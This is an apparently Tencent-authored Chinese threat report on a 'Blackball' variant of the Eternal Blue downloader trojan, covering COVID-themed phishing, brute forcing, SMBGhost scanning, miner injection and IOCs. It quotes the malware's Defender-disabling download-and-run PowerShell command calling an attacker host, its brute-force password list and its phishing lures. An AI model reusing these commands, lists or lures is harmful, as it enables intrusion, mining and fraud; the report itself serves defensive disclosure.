|
一、背景 近期腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种的病毒延续上个版本的邮件蠕虫攻击方法,利用附带Office漏洞CVE-2017-8570漏洞的doc文档以及JS诱饵文件发送钓鱼邮件,同时新增了SMBGhost漏洞CVE-2020-0796机器的检测和上报、新增了SSH爆破攻击相关代码,推测其可能在后续攻击活动中利用SMBGhost漏洞、也可能发起针对Linux系统的攻击。 病毒Payload执行时安装随机名计划任务从新的C2地址t.zer9g.com、t.zz3r0.com下载a.jsp进行持久化攻击,a.jsp继续下载攻击模块if.bin、if_mail.bin以利用漏洞、爆破、钓鱼邮件等方法进行蠕虫式攻击,将XMRig矿机程序m6.bin、m6g.bin注入Powershell.exe运行。病毒还会安装没有实际功能的计划任务blackball(“黑球”),因此将此次攻击命名为“黑球”行动。 腾讯安全系列产品应对永恒之蓝下载器木马的响应清单: | | | | | 1)永恒之蓝下载器木马黑产团伙相关IOCs已入库。 | | 1)永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 | | | 基于网络流量进行威胁检测与主动拦截,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)支持下发访问控制规则封禁目标端口,主动拦截永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796洞相关访问流量。 有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw | 腾讯T-Sec 主机安全 (Cloud Workload Protection,CWP) | 1)云镜已支持永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796的检测; 2)已支持查杀利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵的挖矿木马、后门程序。 | | 1)腾讯御知已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2)已集成无损检测POC,企业可以对自身资产进行远程检测。 | | 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 | | | 基于网络流量进行威胁检测,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)对利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta | | 1)可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序; 2)企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3)企业终端管理系统已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序; |
二、样本分析1.钓鱼邮件攻击首先从outlook应用程序会话中获取邮箱联系人。
然后自动生成readme.doc,readme.js两种附件文件,并将readme.js制作为压缩包readme.zip。其中readme.doc中包含Office漏洞CVE-2017-8570触发代码。readme.js中包含恶意Wscript脚本攻击代码。两种附件被打开后都会执行恶意命令下载http[:]//d.ackng.com/mail.jsp。
在$mail.Body中添加待发送邮件的邮件主题内容,从预置的9个主题中随机选择,主要包含“新冠肺炎COVID-19”, “日常联系对话”, “文件损坏无法查看”三种类型,具体内容如下: 邮件主题 | | 1.The Truth of COVID-19,"Virus actually comes from United States of America" | COVID-19的真相,“病毒实际上来自美利坚合众国。 | | | 2.COVID-19 nCov Special info WHO,"very important infomation for Covid-19 .see attached document for your action and discretion." | COVID-19 nCov特别信息来自WHO”,“ Covid-19非常重要的信息。请参阅随附的文档,以了解您的操作和判断。 | | | 3.HALTH ADVISORY:CORONA VIRUS,"the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.see attached document for your action and discretion. | “卫生建议:冠状病毒”,“冠状病毒的爆发”引起了人们的关注,特别是在外国人士最近到达或不久将到达各个目的地的地方。 | | | 4.WTF,"what's wrong with you?are you out of your mind!!!!!" | | | | 5.What the fcuk,"are you out of your mind!!!!!what 's wrong with you?" | | | | 6.good bye,"good bye, keep in touch" | | | | 7.farewell letter,"good bye, keep in touch" | | | | 8.broken file,"can you help me to fix the file,i can't read it" | | | | 9.This is your order?,"file is brokened, i can't open it" | “这是您的订单吗?”,“文件已损坏,我无法打开它” |
生成的钓鱼邮件示例如下:
最后针对邮箱中发现的每一个联系人,依次发送包含恶意代码的附件readme.doc、readme.zip的邮件。
2.弱口令爆破RDP(3389端口)弱口令爆破,爆破用户名:“administrator”,密码字典: "saadmin","123456","test1","zinch","g_czechout","asdf","Aa123456.","dubsmash","password","PASSWORD","123.com","admin@123","Aa123456","qwer12345","Huawei@123","123@abc","golden","123!@#qwe","1qaz@WSX","Ab123","1qaz!QAZ","Admin123","Administrator","Abc123","Admin@123","999999","Passw0rd","123qwe!@#","football","welcome","1","12","21","123","321","1234","12345","123123","123321","111111","654321","666666","121212","000000","222222","888888","1111","555555","1234567","12345678","123456789","987654321","admin","abc123","abcd1234","abcd@1234","abc@123","p@ssword","P@ssword","p@ssw0rd","P@ssw0rd","P@SSWORD","P@SSW0RD","P@w0rd","P@word","iloveyou","monkey","login","passw0rd","master","hello","qazwsx","password1","Password1","qwerty","baseball","qwertyuiop","superman","1qaz2wsx","fuckyou","123qwe","zxcvbn","pass","aaaaaa","love","administrator","qwe1234A","qwe1234a","123123123","1234567890","88888888","111111111","112233","a123456","123456a","5201314","1q2w3e4r","qwe123","a123456789","123456789a","dragon","sunshine","princess","!@#$%^&*","charlie","aa123456","homelesspa","1q2w3e4r5t","sa","sasa","sa123","sql2005","sa2008","abc","abcdefg","sapassword","Aa12345678","ABCabc123","sqlpassword","sql2008","11223344","admin888","qwe1234","A123456","OPERADOR","Password123","test123","NULL","user","test","Password01","stagiaire","demo","scan","P@ssw0rd123","xerox","compta"。爆破成功后会上报该机器的IP以及此次成功登陆使用的密码,然后利用rdpexec模块远程执行代码$rdp_code: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe&powershell IEX(New-Object Net.WebClient).DownloadString(''http[:]//t.amynx.com/rdp.jsp'')
SMB爆破攻击(445端口),爆破使用用户名为"administrator","admin",爆破成功后远程执行代码$ipc_code:
MSSQL爆破攻击(1433端口),使用与RDP爆破同样的密码字典,爆破成功后远程执行代码$mscmd_code:
此外,最新的攻击代码中还加如了SSH爆破相关命令,该代码将会启动SSH爆破模块,并在爆破成功后执行远程命令$ssh_cmd。但是目前该功能并未启用,相关可能还在开发阶段,后续如果启用之后,可能会导致被感染的Windows机器通过SSH爆破攻击Linux系统。
3.漏洞攻击永恒之蓝下载器木马变种还会利用公开的漏洞检测代码检测存在SMBGhost漏洞CVE-2020-0796的机器IP并上报。
2020年3月12日腾讯安全威胁情报中心发布了SMBv3远程代码执行漏洞CVE-2020-0796(别名:SMBGhost,绰号:永恒之黑)预警公告: 2020年6月2日,国外安全研究员公开了一份SMBGhost漏洞CVE-2020-0796漏洞的RCE代码,腾讯安全团队已对其进行分析并预警: 该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,除了直接攻击SMB服务端造成RCE外,攻击者可以构造特定的网页,压缩包,共享目录,OFFICE文档等多种方式触发漏洞进行攻击。由于漏洞利用源代码被公布,使得漏洞利用风险骤然升级,被黑灰产修改即可用于网络攻击。
利用永恒之蓝漏洞攻击,攻击后远程执行代码$sc_code。
Lnk漏洞利用CVE-2017-8464,在可移动盘、网络磁盘下创建具有CVE-2017-8464漏洞攻击代码的Lnk文件,一旦该文件被查看就会导致恶意代码执行。同时还会释放JS文件readme.js,通过伪装的文件在被误点击时感染病毒。
4.清除竞品挖矿木马永恒之蓝下载器木马在攻击代码if.bin中Killer()函数中会详细地搜集大量竞争对手挖矿木马的信息,包括各类挖矿木马安装的服务、计划任务、进程名,以及挖矿使用的命令行特点、端口号特点来锁定目标并进行清除。
通过服务名匹配: $SrvName ="xWinWpdSrv", "SVSHost", "Microsoft Telemetry", "lsass", "Microsoft", "system", "Oracleupdate", "CLR", "sysmgt", "\gm", "WmdnPnSN", "Sougoudl","National", "Nationaaal", "Natimmonal", "Nationaloll", "Nationalmll","Nationalaie","Nationalwpi","WinHelp32","WinHelp64", "Samserver", "RpcEptManger", "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq","SxS","WinSvc","mssecsvc2.1","mssecsvc2.0","Windows_Update","Windows Managers","SvcNlauser","WinVaultSvc","Xtfy","Xtfya","Xtfyxxx","360rTys","IPSECS","MpeSvc","SRDSL","WifiService","ALGM","wmiApSrvs","wmiApServs","taskmgr1","WebServers","ExpressVNService","WWW.DDOS.CN.COM","WinHelpSvcs","aspnet_staters","clr_optimization","AxInstSV","Zational","DNS Server","Serhiez","SuperProServer",".Net CLR","WissssssnHelp32","WinHasdadelp32","WinHasdelp32","ClipBooks"
通过计划任务名匹配: $TaskName = "my1","Mysa", "Mysa1", "Mysa2", "Mysa3", "ok", "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service","Oracle Products Reporter", "Update service for products", "gm", "ngm","Sorry","Windows_Update","Update_windows","WindowsUpdate1","WindowsUpdate2","WindowsUpdate3","Adobe{过}{滤}FlashPlayer","FlashPlayer1","FlashPlayer2","FlashPlayer3","IIS","WindowsLogTasks","System Log Security Check","Update","Update1","Update2","Update3","Update4","DNS","SYSTEM","DNS2","SYSTEMa","skycmd","Miscfost","Netframework","Flash","RavTask","GooglePingConfigs","HomeGroupProvider","MiscfostNsi","WwANsvc","Bluetooths","Ddrivers","DnsScan","WebServers","Credentials","TablteInputout","werclpsyport","HispDemorn","LimeRAT-Admin","DnsCore","Update service for Windows Service","DnsCore","ECDnsCore"
通过命令行特征匹配: $_.CommandLine -like '*pool.monero.hashvault.pro*' -Or $_.CommandLine -like '*blazepool*' -Or $_.CommandLine -like '*blockmasters*' -Or $_.CommandLine -like '*blockmasterscoins*' -Or $_.CommandLine -like '*bohemianpool*' -Or $_.CommandLine -like '*cryptmonero*' -Or $_.CommandLine -like '*cryptonight*' -Or $_.CommandLine -like '*crypto-pool*' -Or $_.CommandLine -like '*--donate-level*' -Or $_.CommandLine -like '*dwarfpool*' -Or $_.CommandLine -like '*hashrefinery*' -Or $_.CommandLine -like '*hashvault.pro*' -Or $_.CommandLine -like '*iwanttoearn.money*' -Or $_.CommandLine -like '*--max-cpu-usage*' -Or $_.CommandLine -like '*mine.bz*' -Or $_.CommandLine -like '*minercircle.com*' -Or $_.CommandLine -like '*minergate*' -Or $_.CommandLine -like '*miners.pro*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*minexmr*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*miningpoolhubcoins*' -Or $_.CommandLine -like '*mixpools.org*' -Or $_.CommandLine -like '*mixpools.org*' -Or $_.CommandLine -like '*monero*' -Or $_.CommandLine -like '*monero*' -Or $_.CommandLine -like '*monero.lindon-pool.win*' -Or $_.CommandLine -like '*moriaxmr.com*' -Or $_.CommandLine -like '*mypool.online*' -Or $_.CommandLine -like '*nanopool.org*' -Or $_.CommandLine -like '*nicehash*' -Or $_.CommandLine -like '*-p x*' -Or $_.CommandLine -like '*pool.electroneum.hashvault.pro*' -Or $_.CommandLine -like '*pool.xmr*' -Or $_.CommandLine -like '*poolto.be*' -Or $_.CommandLine -like '*prohash*' -Or $_.CommandLine -like '*prohash.net*' -Or $_.CommandLine -like '*ratchetmining.com*' -Or $_.CommandLine -like '*slushpool*' -Or $_.CommandLine -like '*stratum+*' -Or $_.CommandLine -like '*suprnova.cc*' -Or $_.CommandLine -like '*teracycle.net*' -Or $_.CommandLine -like '*usxmrpool*' -Or $_.CommandLine -like '*viaxmr.com*' -Or $_.CommandLine -like '*xmrpool*' -Or $_.CommandLine -like '*yiimp*' -Or $_.CommandLine -like '*zergpool*' -Or $_.CommandLine -like '*zergpoolcoins*' -Or $_.CommandLine -like '*zpool*'
通过网络端口匹配: ($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":1111") -or $t.contains(":2222") -or $t.contains(":3333") -or $t.contains(":4444") -or $t.contains(":5555") -or $t.contains(":6666") -or $t.contains(":7777") -or $t.contains(":8888") -or $t.contains(":9999") -or $t.contains(":14433") -or $t.contains(":14444") -or $t.contains(":45560") -or $t.contains(":65333"))
通过进程名匹配: $Miner ="SC","WerMgr","WerFault","DW20","msinfo", "XMR*","xmrig*", "minerd", "MinerGate", "Carbon", "yamm1", "upgeade", "auto-upgeade", "svshost",
"SystemIIS", "SystemIISSec", 'WindowsUpdater*', "WindowsDefender*", "update", "carss", "service", "csrsc", "cara", "javaupd", "gxdrv", "lsmosee", "secuams", "SQLEXPRESS_X64_86", "Calligrap", "Sqlceqp", "Setting", "Uninsta", "conhoste","Setring","Galligrp","Imaging","taskegr","Terms.EXE","360","8866","9966","9696","9797","svchosti","SearchIndex","Avira","cohernece","win","SQLforwin","xig*","taskmgr1","Workstation","ress","explores"
5.执行Payload通过爆破、RCE漏洞攻击、钓鱼邮件攻击后会下载和执行Powershell代码: http[:]//t.amynx.com/mail.jsp或http[:]//t.amynx.com/usb.jsp mail.jsp更新C2地址为:t.amynx.com、t.zer9g.com、t.zz3r0.com,并且安装计划任务blackball(“黑球”),该计划任务无实际代码执行。 然后mail.jsp安装一个三个随机名计划任务(分别为<random>、<random>\<random>、MicroSoft\Windows\<random>),执行命令为“PS_CMD”。之后三个计划任务中的命令“PS_CMD”被替换为下载和执行Powershell代码http[:]//t.awcna.com/a.jsp、http[:]//t.zer9g.com /a.jsp、http[:]//t.zz3r0.com /a.jsp以达到持久化攻击。
a.jsp负责下载攻击模块if.bin执行漏洞利用和弱口令爆破功能。下载门罗币挖矿模块m6.bin、m6g.bin,并通过Invoke-ReflectivePEInjection将XMR挖矿木马注入Powershell.exe运行,连接矿池lplp.ackng.com:443挖矿,导致CPU占用率接近100%。
将OutLook注册表 “*\Outlook\Security”下的ObjectModelGuard值设为2,即不对outlook任何可疑活动进行提示。
然后下载和执行Powershell版邮件蠕虫攻击程序http[:]//d.ackng.com/if_mail.bin,获取邮箱所有联系人,依次发送钓鱼邮件,进入下一轮攻击流程。
6.历次版本根据腾讯安全威胁情报中心持续跟踪结果,永恒之蓝下载器病毒2018~2020历次变化情况如下:
三、IOCsDomain t.amynx.com t.zer9g.com t.zz3r0.com d.ackng.com URL: http[:]//d.ackng.com/if_mail.bin http[:]//d.ackng.com/if.bin http[:]//t.zer9g.com/a.jsp http[:]//t.zz3r0.com/a.jsp http[:]//t.amynx.com/mail.jsp md5 if.bin e5ae6d154a6befc00deea0ccb49dc9b8 if_mail.bin 88949e6a329c6b2796ddcc81564cee1a a.jsp e3687c56b8be535398051405f8221d82 usb.jsp 7805776504e8a39c2a892d89e2492c12 mail.jsp cc67b69740c7bd0744acd3242729ce15 参考链接: “来自“蓝茶”的问候:“你是不是疯了”,暗藏新攻击手法” “SMBGhost漏洞(CVE-2020-0796)利用源码公开,安全风险骤然升级”
|
发表于 2020-6-3 20:14:23
